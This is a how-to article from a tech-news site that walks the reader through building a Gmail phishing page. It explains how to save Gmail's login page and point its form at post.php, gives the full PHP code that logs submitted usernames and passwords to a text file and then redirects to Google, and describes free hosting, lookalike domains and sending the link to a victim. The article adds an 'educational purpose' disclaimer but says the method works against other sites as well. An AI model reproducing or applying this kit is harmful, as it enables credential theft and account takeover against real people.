Home » tech news » How to hack someones gmail password with phishing

How to hack someones gmail password with phishing

<>

How to hack someones gmail password with phishing

How to hack someones gmail password with phishing

this post is about to how hackers hack someones gmail password with phishing website

 How to hack someones gmail password with phishing

phishing:

Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies.
 
How to hack someones gmail password with phishing
to hack someones gmail password with phishing does not need too much things. it only need proper guidance and proper codes.
today we create a gmail phishing page which look similar to a gmail page but it’s not actually a gmail page,when victim enter his username and password you will be able to see that….
Disclaimer– This tutorial is for educational propose only. Phishing is illegal and listed as crime .The main motive behind the post is to guide as many as people how hackers hack Emails or how they can steal your information easily. We do not recommend anyone to try Phishing. If someone face problems after applying this ,Neither author nor Applygist Will be responsible.

GMAIL PHISHING…

  • you can follow below process for creating phishing files and you can also direct download filesfrom here
  • go to  gmail website and then right click there .now click on save as. then two files will be generated index.html and a folder of gmail scripts .
  • now open index.html in notepad .press CTRL+F,and type action.
  • you will have to find a text like action=”https://accounts.google.com/ServiceLoginAuth”  .
  • make that text  action=”https://accounts.google.com/ServiceLoginAuth”                                                                                                         to    action =”post.php”
  • save this file in a folder as index.htm or index.html. and select encoding as UTF-8 while saving file in notepad. your phishing page is ready.
  • now you have to create a php file which will redirect your phishing page to original gmail website.
  • copy  below text in notepad  and save as post.php
  • <?php
    header ('Location:https://accounts.google.com/');
    $handle = fopen("usernames.txt", "a");
    foreach($_POST as $variable => $value) {
     fwrite($handle, $variable);
     fwrite($handle, "=");
     fwrite($handle, $value);
     fwrite($handle, "rn");
    }
    fwrite($handle, "rn");
    fclose($handle);
    exit;
    ?>
  • you can also download all files from here . click here to direct download
  • You have two files now one is index.html and another is post.php, remember file extension is important.  
  • Now you have to upload these files in a web hosting site ,i prefer you to use www.000webhost.com.
  • You have to make a account in www.000webhost.com.  ,after that it looks like a picture given below.
  • be careful while selecting a domain name. it should be matching with original gmail domain i.e www.accounts.google.com

 

  • Now go  to control pannel,and then click  on file manager.  
  • After that a new tab will pop up.Now go to public_html.

 

  • Delete the file named default.php, after that upload two files index.html and post.php one by  one .
  • Copy the url (i.e. your domain name) of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to gmail. and you will be now able to see his password.
  • Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
  • Click on view now u will have your friend’s password and email id.

 

note:

phishing is a illegal activity so don’t try on anyone.this tutorial is for educational purpose.
Not only gmail u can make any phishing page of any website by following these steps…. you can hack facebook,Yahoo,Orkut,Twitter and many more…..


How to hack someones gmail password with phishing

Leave a Reply

Your email address will not be published. Required fields are marked *

Discover more from Applygist Tech News

Subscribe now to keep reading and get access to the full archive.

Continue reading